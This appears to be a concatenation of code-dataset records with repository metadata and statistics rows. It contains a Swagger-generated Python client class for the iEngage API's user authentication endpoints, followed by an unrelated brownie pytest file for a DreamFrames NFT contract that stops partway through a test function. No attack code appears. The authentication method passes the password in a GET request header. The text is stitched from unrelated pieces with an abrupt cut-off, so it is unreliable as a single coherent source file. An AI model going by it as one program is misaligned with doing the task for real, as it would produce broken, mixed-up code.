753212178d6a56843f43b80e9e337f9f296b8277
| 48,934
|
py
|
Python
|
iengage_client/apis/user_authentication_api.py
|
iEngage/python-sdk
|
76cc6ed697d7599ce9af74124c12d33ad5aff419
|
[
"Apache-2.0"
] | null | null | null |
iengage_client/apis/user_authentication_api.py
|
iEngage/python-sdk
|
76cc6ed697d7599ce9af74124c12d33ad5aff419
|
[
"Apache-2.0"
] | null | null | null |
iengage_client/apis/user_authentication_api.py
|
iEngage/python-sdk
|
76cc6ed697d7599ce9af74124c12d33ad5aff419
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
iEngage 2.0 API
This API enables Intelligent Engagement for your Business. iEngage is a platform that combines process, augmented intelligence and rewards to help you intelligently engage customers.
OpenAPI spec version: 2.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class UserAuthenticationApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def add_notification_registered_id(self, registered_id, type, client_token, **kwargs):
"""
Add device token
Add device token to push notification from server
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_notification_registered_id(registered_id, type, client_token, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str registered_id: Registered device token to be added (required)
:param str type: Type of device android, ios (required)
:param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
:param str requester_id: requesterId can be user id OR email address.
:param str access_token: Unique session token for user. To get access token user will have to authenticate
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.add_notification_registered_id_with_http_info(registered_id, type, client_token, **kwargs)
else:
(data) = self.add_notification_registered_id_with_http_info(registered_id, type, client_token, **kwargs)
return data
def add_notification_registered_id_with_http_info(self, registered_id, type, client_token, **kwargs):
"""
Add device token
Add device token to push notification from server
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_notification_registered_id_with_http_info(registered_id, type, client_token, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str registered_id: Registered device token to be added (required)
:param str type: Type of device android, ios (required)
:param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
:param str requester_id: requesterId can be user id OR email address.
:param str access_token: Unique session token for user. To get access token user will have to authenticate
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['registered_id', 'type', 'client_token', 'requester_id', 'access_token']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_notification_registered_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'registered_id' is set
if ('registered_id' not in params) or (params['registered_id'] is None):
raise ValueError("Missing the required parameter `registered_id` when calling `add_notification_registered_id`")
# verify the required parameter 'type' is set
if ('type' not in params) or (params['type'] is None):
raise ValueError("Missing the required parameter `type` when calling `add_notification_registered_id`")
# verify the required parameter 'client_token' is set
if ('client_token' not in params) or (params['client_token'] is None):
raise ValueError("Missing the required parameter `client_token` when calling `add_notification_registered_id`")
resource_path = '/devices'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
if 'requester_id' in params:
header_params['requesterId'] = params['requester_id']
if 'access_token' in params:
header_params['accessToken'] = params['access_token']
if 'client_token' in params:
header_params['clientToken'] = params['client_token']
form_params = []
local_var_files = {}
if 'registered_id' in params:
form_params.append(('registeredId', params['registered_id']))
if 'type' in params:
form_params.append(('type', params['type']))
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['default']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def add_user(self, screen_name, email_id, password, client_token, **kwargs):
"""
Add/Register new user
Add/Register new user. Returns the user
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_user(screen_name, email_id, password, client_token, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str screen_name: unique ID of user (required)
:param str email_id: email ID (required)
:param str password: password (required)
:param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
:param str first_name: first name
:param str middle_name: middle name
:param str last_name: last name
:param int birth_day: birth day
:param int birth_month: birth month
:param int birth_year: birth year
:param str addition_information: addition information
:return: VerveResponseUser
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.add_user_with_http_info(screen_name, email_id, password, client_token, **kwargs)
else:
(data) = self.add_user_with_http_info(screen_name, email_id, password, client_token, **kwargs)
return data
def add_user_with_http_info(self, screen_name, email_id, password, client_token, **kwargs):
"""
Add/Register new user
Add/Register new user. Returns the user
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_user_with_http_info(screen_name, email_id, password, client_token, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str screen_name: unique ID of user (required)
:param str email_id: email ID (required)
:param str password: password (required)
:param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
:param str first_name: first name
:param str middle_name: middle name
:param str last_name: last name
:param int birth_day: birth day
:param int birth_month: birth month
:param int birth_year: birth year
:param str addition_information: addition information
:return: VerveResponseUser
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['screen_name', 'email_id', 'password', 'client_token', 'first_name', 'middle_name', 'last_name', 'birth_day', 'birth_month', 'birth_year', 'addition_information']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'screen_name' is set
if ('screen_name' not in params) or (params['screen_name'] is None):
raise ValueError("Missing the required parameter `screen_name` when calling `add_user`")
# verify the required parameter 'email_id' is set
if ('email_id' not in params) or (params['email_id'] is None):
raise ValueError("Missing the required parameter `email_id` when calling `add_user`")
# verify the required parameter 'password' is set
if ('password' not in params) or (params['password'] is None):
raise ValueError("Missing the required parameter `password` when calling `add_user`")
# verify the required parameter 'client_token' is set
if ('client_token' not in params) or (params['client_token'] is None):
raise ValueError("Missing the required parameter `client_token` when calling `add_user`")
resource_path = '/users'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
if 'client_token' in params:
header_params['clientToken'] = params['client_token']
form_params = []
local_var_files = {}
if 'screen_name' in params:
form_params.append(('screenName', params['screen_name']))
if 'first_name' in params:
form_params.append(('firstName', params['first_name']))
if 'middle_name' in params:
form_params.append(('middleName', params['middle_name']))
if 'last_name' in params:
form_params.append(('lastName', params['last_name']))
if 'email_id' in params:
form_params.append(('emailId', params['email_id']))
if 'password' in params:
form_params.append(('password', params['password']))
if 'birth_day' in params:
form_params.append(('birthDay', params['birth_day']))
if 'birth_month' in params:
form_params.append(('birthMonth', params['birth_month']))
if 'birth_year' in params:
form_params.append(('birthYear', params['birth_year']))
if 'addition_information' in params:
form_params.append(('additionInformation', params['addition_information']))
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['default']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VerveResponseUser',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def authenticate(self, user_name, password, client_token, **kwargs):
"""
Authenticate User
Authenticate with username & password
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.authenticate(user_name, password, client_token, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str user_name: User name (required)
:param str password: Password (required)
:param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
:return: User
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.authenticate_with_http_info(user_name, password, client_token, **kwargs)
else:
(data) = self.authenticate_with_http_info(user_name, password, client_token, **kwargs)
return data
def authenticate_with_http_info(self, user_name, password, client_token, **kwargs):
"""
Authenticate User
Authenticate with username & password
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.authenticate_with_http_info(user_name, password, client_token, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str user_name: User name (required)
:param str password: Password (required)
:param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
:return: User
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user_name', 'password', 'client_token']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method authenticate" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user_name' is set
if ('user_name' not in params) or (params['user_name'] is None):
raise ValueError("Missing the required parameter `user_name` when calling `authenticate`")
# verify the required parameter 'password' is set
if ('password' not in params) or (params['password'] is None):
raise ValueError("Missing the required parameter `password` when calling `authenticate`")
# verify the required parameter 'client_token' is set
if ('client_token' not in params) or (params['client_token'] is None):
raise ValueError("Missing the required parameter `client_token` when calling `authenticate`")
resource_path = '/authenticate'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
if 'user_name' in params:
header_params['userName'] = params['user_name']
if 'password' in params:
header_params['password'] = params['password']
if 'client_token' in params:
header_params['clientToken'] = params['client_token']
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['default']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='User',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def change_password(self, current_password, new_password, requester_id, client_token, **kwargs):
"""
Change password
Allows the user to change password. Returns true if successful
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.change_password(current_password, new_password, requester_id, client_token, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str current_password: Current password (required)
:param str new_password: New password (required)
:param str requester_id: requesterId can be user id OR email address. (required)
:param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
:param str access_token: Unique session token for user. To get access token user will have to authenticate
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.change_password_with_http_info(current_password, new_password, requester_id, client_token, **kwargs)
else:
(data) = self.change_password_with_http_info(current_password, new_password, requester_id, client_token, **kwargs)
return data
def change_password_with_http_info(self, current_password, new_password, requester_id, client_token, **kwargs):
"""
Change password
Allows the user to change password. Returns true if successful
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.change_password_with_http_info(current_password, new_password, requester_id, client_token, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str current_password: Current password (required)
:param str new_password: New password (required)
:param str requester_id: requesterId can be user id OR email address. (required)
:param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
:param str access_token: Unique session token for user. To get access token user will have to authenticate
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['current_password', 'new_password', 'requester_id', 'client_token', 'access_token']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method change_password" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'current_password' is set
if ('current_password' not in params) or (params['current_password'] is None):
raise ValueError("Missing the required parameter `current_password` when calling `change_password`")
# verify the required parameter 'new_password' is set
if ('new_password' not in params) or (params['new_password'] is None):
raise ValueError("Missing the required parameter `new_password` when calling `change_password`")
# verify the required parameter 'requester_id' is set
if ('requester_id' not in params) or (params['requester_id'] is None):
raise ValueError("Missing the required parameter `requester_id` when calling `change_password`")
# verify the required parameter 'client_token' is set
if ('client_token' not in params) or (params['client_token'] is None):
raise ValueError("Missing the required parameter `client_token` when calling `change_password`")
resource_path = '/users/password'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
if 'requester_id' in params:
header_params['requesterId'] = params['requester_id']
if 'access_token' in params:
header_params['accessToken'] = params['access_token']
if 'client_token' in params:
header_params['clientToken'] = params['client_token']
form_params = []
local_var_files = {}
if 'current_password' in params:
form_params.append(('currentPassword', params['current_password']))
if 'new_password' in params:
form_params.append(('newPassword', params['new_password']))
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['default']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def create_association(self, name, requester_id, client_token, **kwargs):
"""
Create association
Create association. Returns the association
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_association(name, requester_id, client_token, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: association name (required)
:param str requester_id: requesterId can be user id OR email address. (required)
:param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
:param str access_token: Unique session token for user. To get access token user will have to authenticate
:return: VerveResponseAssociation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_association_with_http_info(name, requester_id, client_token, **kwargs)
else:
(data) = self.create_association_with_http_info(name, requester_id, client_token, **kwargs)
return data
def create_association_with_http_info(self, name, requester_id, client_token, **kwargs):
"""
Create association
Create association. Returns the association
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_association_with_http_info(name, requester_id, client_token, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: association name (required)
:param str requester_id: requesterId can be user id OR email address. (required)
:param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
:param str access_token: Unique session token for user. To get access token user will have to authenticate
:return: VerveResponseAssociation
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'requester_id', 'client_token', 'access_token']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_association" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `create_association`")
# verify the required parameter 'requester_id' is set
if ('requester_id' not in params) or (params['requester_id'] is None):
raise ValueError("Missing the required parameter `requester_id` when calling `create_association`")
# verify the required parameter 'client_token' is set
if ('client_token' not in params) or (params['client_token'] is None):
raise ValueError("Missing the required parameter `client_token` when calling `create_association`")
resource_path = '/associations'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
if 'requester_id' in params:
header_params['requesterId'] = params['requester_id']
if 'access_token' in params:
header_params['accessToken'] = params['access_token']
if 'client_token' in params:
header_params['clientToken'] = params['client_token']
form_params = []
local_var_files = {}
if 'name' in params:
form_params.append(('name', params['name']))
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['default']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VerveResponseAssociation',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def delete_user(self, user_id, client_token, **kwargs):
"""
Delete user
Allows the user to delete user. Returns the deleted user
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_user(user_id, client_token, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int user_id: userId (required)
:param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
:return: VerveResponseUser
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_user_with_http_info(user_id, client_token, **kwargs)
else:
(data) = self.delete_user_with_http_info(user_id, client_token, **kwargs)
return data
def delete_user_with_http_info(self, user_id, client_token, **kwargs):
"""
Delete user
Allows the user to delete user. Returns the deleted user
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_user_with_http_info(user_id, client_token, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int user_id: userId (required)
:param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
:return: VerveResponseUser
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user_id', 'client_token']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user_id' is set
if ('user_id' not in params) or (params['user_id'] is None):
raise ValueError("Missing the required parameter `user_id` when calling `delete_user`")
# verify the required parameter 'client_token' is set
if ('client_token' not in params) or (params['client_token'] is None):
raise ValueError("Missing the required parameter `client_token` when calling `delete_user`")
resource_path = '/users/{userId}'.replace('{format}', 'json')
path_params = {}
if 'user_id' in params:
path_params['userId'] = params['user_id']
query_params = {}
header_params = {}
if 'client_token' in params:
header_params['clientToken'] = params['client_token']
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['default']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VerveResponseUser',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def get_associations(self, requester_id, client_token, **kwargs):
"""
Get list of associations
Return the list of association
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_associations(requester_id, client_token, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str requester_id: requesterId can be user id OR email address. (required)
:param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
:param str access_token: Unique session token for user. To get access token user will have to authenticate
:return: VerveResponseAssociationList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_associations_with_http_info(requester_id, client_token, **kwargs)
else:
(data) = self.get_associations_with_http_info(requester_id, client_token, **kwargs)
return data
def get_associations_with_http_info(self, requester_id, client_token, **kwargs):
"""
Get list of associations
Return the list of association
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_associations_with_http_info(requester_id, client_token, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str requester_id: requesterId can be user id OR email address. (required)
:param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
:param str access_token: Unique session token for user. To get access token user will have to authenticate
:return: VerveResponseAssociationList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['requester_id', 'client_token', 'access_token']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_associations" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'requester_id' is set
if ('requester_id' not in params) or (params['requester_id'] is None):
raise ValueError("Missing the required parameter `requester_id` when calling `get_associations`")
# verify the required parameter 'client_token' is set
if ('client_token' not in params) or (params['client_token'] is None):
raise ValueError("Missing the required parameter `client_token` when calling `get_associations`")
resource_path = '/associations'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
if 'requester_id' in params:
header_params['requesterId'] = params['requester_id']
if 'access_token' in params:
header_params['accessToken'] = params['access_token']
if 'client_token' in params:
header_params['clientToken'] = params['client_token']
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['default']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VerveResponseAssociationList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def logout(self, requester_id, client_token, **kwargs):
"""
Logout
Logout rest api session. Returns true if successful
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.logout(requester_id, client_token, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str requester_id: requesterId can be user id OR email address. (required)
:param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
:param str access_token: Unique session token for user. To get access token user will have to authenticate
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.logout_with_http_info(requester_id, client_token, **kwargs)
else:
(data) = self.logout_with_http_info(requester_id, client_token, **kwargs)
return data
def logout_with_http_info(self, requester_id, client_token, **kwargs):
"""
Logout
Logout rest api session. Returns true if successful
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.logout_with_http_info(requester_id, client_token, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str requester_id: requesterId can be user id OR email address. (required)
:param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
:param str access_token: Unique session token for user. To get access token user will have to authenticate
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['requester_id', 'client_token', 'access_token']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method logout" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'requester_id' is set
if ('requester_id' not in params) or (params['requester_id'] is None):
raise ValueError("Missing the required parameter `requester_id` when calling `logout`")
# verify the required parameter 'client_token' is set
if ('client_token' not in params) or (params['client_token'] is None):
raise ValueError("Missing the required parameter `client_token` when calling `logout`")
resource_path = '/logout'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
if 'requester_id' in params:
header_params['requesterId'] = params['requester_id']
if 'access_token' in params:
header_params['accessToken'] = params['access_token']
if 'client_token' in params:
header_params['clientToken'] = params['client_token']
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['default']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
| 46.961612
| 186
| 0.60788
| 5,350
| 48,934
| 5.36486
| 0.052336
| 0.052122
| 0.032054
| 0.020068
| 0.915894
| 0.898021
| 0.880392
| 0.87088
| 0.862518
| 0.842798
| 0
| 0.000327
| 0.312462
| 48,934
| 1,041
| 187
| 47.006724
| 0.852782
| 0.372502
| 0
| 0.704453
| 0
| 0
| 0.215857
| 0.031148
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034413
| false
| 0.07085
| 0.01417
| 0
| 0.09919
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
7540ab0fc6570854286df8bd33c05728af89ec98
| 10,575
|
py
|
Python
|
tests/DreamFrames/test_dreamFramesNft.py
|
apguerrera/DreamFrames
|
ad6c7c081378f02010583dbdcb33e8ff112dd94b
|
[
"MIT"
] | 2
|
2020-06-09T02:12:21.000Z
|
2021-02-06T07:33:31.000Z
|
tests/DreamFrames/test_dreamFramesNft.py
|
apguerrera/DreamFrames
|
ad6c7c081378f02010583dbdcb33e8ff112dd94b
|
[
"MIT"
] | null | null | null |
tests/DreamFrames/test_dreamFramesNft.py
|
apguerrera/DreamFrames
|
ad6c7c081378f02010583dbdcb33e8ff112dd94b
|
[
"MIT"
] | 2
|
2019-05-01T01:53:42.000Z
|
2020-05-11T14:11:56.000Z
|
from brownie import accounts, web3, Wei, reverts
from brownie.network.transaction import TransactionReceipt
from brownie.convert import to_address
import pytest
from brownie import Contract
@pytest.fixture(autouse=True)
def isolation(fn_isolation):
pass
""" def test_get_keys(dream_frames_nft):
holder = accounts[0]
_type = "DreamFrames"
dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, holder, _type, accounts[0])
dream_frames_nft, token2 = _dream_frames_nft_mint(dream_frames_nft, holder, _type, accounts[2])
print(dream_frames_nft.getKeys(token1)) """
def test_get_key(dream_frames_nft):
holder = accounts[0]
_type = "DreamFrames"
dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, holder, _type, accounts[0])
dream_frames_nft, token2 = _dream_frames_nft_mint(dream_frames_nft, holder, _type, accounts[2])
_index = 0
key = dream_frames_nft.getKey(token1, _index)
assert key == "type"
_index = 1
key = dream_frames_nft.getKey(token1, _index)
assert key == "subtype"
_index = 2
key = dream_frames_nft.getKey(token1, _index)
assert key == "name"
_index = 3
key = dream_frames_nft.getKey(token1, _index)
assert key == "description"
_index = 4
key = dream_frames_nft.getKey(token1, _index)
assert key == "tags"
_index = 100
key = dream_frames_nft.getKey(token1, _index)
assert key == ""
def test_get_Value(dream_frames_nft):
holder = accounts[0]
_type = "DreamFrames"
dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, holder, _type, accounts[0])
dream_frames_nft, token2 = _dream_frames_nft_mint(dream_frames_nft, holder, _type, accounts[2])
